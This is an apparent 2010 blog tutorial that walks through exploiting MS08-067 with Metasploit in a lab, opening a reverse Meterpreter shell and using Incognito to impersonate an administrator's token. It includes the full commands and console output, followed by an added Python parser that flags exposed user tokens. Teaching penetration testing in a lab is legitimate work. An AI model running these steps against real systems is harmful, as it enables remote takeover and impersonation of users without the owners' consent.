Using Metasploit’s Incognito To Impersonate User Tokens

January 30, 2010 – 10:48 AM

I just wanted to show a quick example of using Incognito to impersonate user tokens on a compromised system. You can think of a token as something like a web “cookie”: an object that holds the security context of your logon session so that you don’t have to re-authenticate to the system or network each time you access another object. You can read more about tokens here: http://en.wikipedia.org/wiki/Token_(Windows_NT_architecture)

On this particular machine, “Troy” is an Admin account.

(without all the screenshots – sorry dial-up users)

We’ll start off by launching Metasploit and exploiting the system. For this we need to make sure the payload returns a Meterpreter session to us:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LHOST                      yes       The local address
LPORT     4444             yes       The local port

Exploit target:
Id  Name
--  ----
0   Automatic Targeting

msf exploit(ms08_067_netapi) > set rhost 10.6.18.104
rhost => 10.6.18.104
msf exploit(ms08_067_netapi) > set lhost 10.6.18.100
lhost => 10.6.18.100
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.6.18.100:4444 -> 10.6.18.104:1089)

meterpreter >

Once we have a Meterpreter session we can load the Incognito extension, list the available tokens and impersonate the one we want:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > use Incognito
Loading extension incognito...success.
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
VM-WINXP\Troy
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter > impersonate_token vm-winxp\\troy
[+] Delegation token available
[+] Successfully impersonated user VM-WINXP\Troy
meterpreter > getuid
Server username: VM-WINXP\Troy
meterpreter > execute -f cmd.exe -i -t
Process 416 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>whoami
whoami
VM-WINXP\Troy
C:\WINDOWS\system32>exit
meterpreter > getuid
Server username: VM-WINXP\Troy
meterpreter > drop_token
Relinquished token, now running as: NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Complete success without having to crack passwords or “pass the hash”.
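From the defender's side, the interesting part of that token listing is what it reveals: every delegation token for a real user is a live logon session on the host, and a compromise of the host hands that identity over without any password attack. As an added example (not part of the original post and not Incognito's own code), the Python below parses the `list_tokens -u` format shown above, separates built-in service identities from user sessions, and matches a requested name the way the post's `impersonate_token vm-winxp\\troy` did; the sample listing is constructed from the post's output.

```python
"""Parse Incognito's `list_tokens -u` listing. SAMPLE_LISTING is constructed from the post above."""
SAMPLE_LISTING = """\
Delegation Tokens Available
========================================
NT AUTHORITY\\LOCAL SERVICE
NT AUTHORITY\\NETWORK SERVICE
NT AUTHORITY\\SYSTEM
VM-WINXP\\Troy
Impersonation Tokens Available
========================================
NT AUTHORITY\\ANONYMOUS LOGON
"""
SECTION_HEADERS = {
    "Delegation Tokens Available": "delegation",
    "Impersonation Tokens Available": "impersonation",
}
BUILTIN_AUTHORITIES = {"NT AUTHORITY"}  # service identities, not a person's session

def parse_list_tokens(text):
    """Return {'delegation': [...], 'impersonation': [...]} from the listing."""
    tokens = {"delegation": [], "impersonation": []}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or set(line) == {"="}:  # blank line or ===== separator
            continue
        if line in SECTION_HEADERS:
            current = SECTION_HEADERS[line]
            continue
        if current is None:
            raise ValueError(f"token line before any section header: {line!r}")
        tokens[current].append(line)
    return tokens

def exposed_user_tokens(tokens):
    """Delegation tokens of real accounts: each one is a live logon session that
    a host compromise hands over with no password cracking (Troy, in the post)."""
    return [n for n in tokens["delegation"]
            if n.partition("\\")[0].upper() not in BUILTIN_AUTHORITIES]

def find_token(tokens, requested):
    """Match a name as the post does: case-insensitively, and accepting the
    doubled backslash typed at the meterpreter prompt (vm-winxp\\\\troy)."""
    wanted = requested.replace("\\\\", "\\").upper()
    for kind, names in tokens.items():
        for name in names:
            if name.upper() == wanted:
                return kind, name
    return None
```

Running `exposed_user_tokens(parse_list_tokens(SAMPLE_LISTING))` on the post's listing singles out `VM-WINXP\Troy`, the one account whose open session turned a SYSTEM shell into an admin user's identity.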
